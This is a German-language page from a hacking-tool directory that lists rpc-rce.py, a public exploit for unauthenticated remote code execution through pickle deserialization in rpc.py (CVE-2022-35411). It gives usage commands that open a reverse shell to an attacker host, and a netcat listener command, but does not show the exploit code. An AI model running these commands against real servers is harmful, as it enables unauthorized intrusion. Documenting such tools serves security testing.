Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rpc-rce.py — Exploit für CVE-2022-35411 — Unauthentifizierte RCE in rpc.py (<= 0.6.0) | Kitploit
Tools/GitHubGitHub/cspanias/rpc-rce.py
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubcspanias/rpc-rce.py

rpc-rce.py

Exploit für CVE-2022-35411 — Unauthentifizierte RCE in rpc.py (<= 0.6.0)

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

rpc.py RCE Exploit (CVE-2022-35411)

Dies ist ein aktualisierter und verbesserter Exploit für CVE-2022-35411, der auf anfällige Versionen von rpc.py (<= 0.6.0) abzielt.
Er ermöglicht nicht authentifizierte Remotecodeausführung (RCE) über Python pickle-Deserialisierung.

Ursprünglicher Exploit von: Elias Hohl
Verbessert von: x7331 für Benutzerfreundlichkeit, Portabilität und Automatisierung


Schwachstellenübersicht

Die Schwachstelle liegt in der unsicheren Verwendung des Python-pickle-Moduls durch rpc.py, wodurch manipulierte Payloads beliebige Befehle ohne Authentifizierung ausführen können.

  • CVE-ID: CVE-2022-35411
  • Betroffene Versionen: rpc.py v0.4.2 – v0.6.0
  • Exploit-Typ: Nicht authentifizierte Remotecodeausführung (RCE)

Änderungen

  • ✅ Umstellung auf argparse mit den Flags --lhost, --lport, --target und --dry-run
  • ✅ Saubere, modulare Code-Struktur
  • ✅ Optionale Reverse-Shell-Übermittlung (TCP Bash)
  • ✅ Curl-Test-Payload (sicherer Modus)
  • ✅ Protokollierungsunterstützung und übersichtlichere Ausgabe
  • ✅ Richtige Nutzungshinweise über -h / --help
  • ✅ Metadaten und Inline-Kommentare für Klarheit

Verwendung

Reverse-Shell-Beispiel

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

Probelauf (keine Shell, nur Curl-Test)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

Benutzerdefiniertes Ziel (optional)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek (Installation mit pip install requests)
  • Einen Listener auf Ihrem LHOST (z. B. nc -lvnp 9001)
  • Ein anfälliger rpc.py-Server läuft

Rechtlicher und ethischer Hinweis

Dieser Exploit wird nur zu Bildungs- und autorisierten Testzwecken bereitgestellt. Verwenden Sie ihn NICHT auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.

Tool herunterladen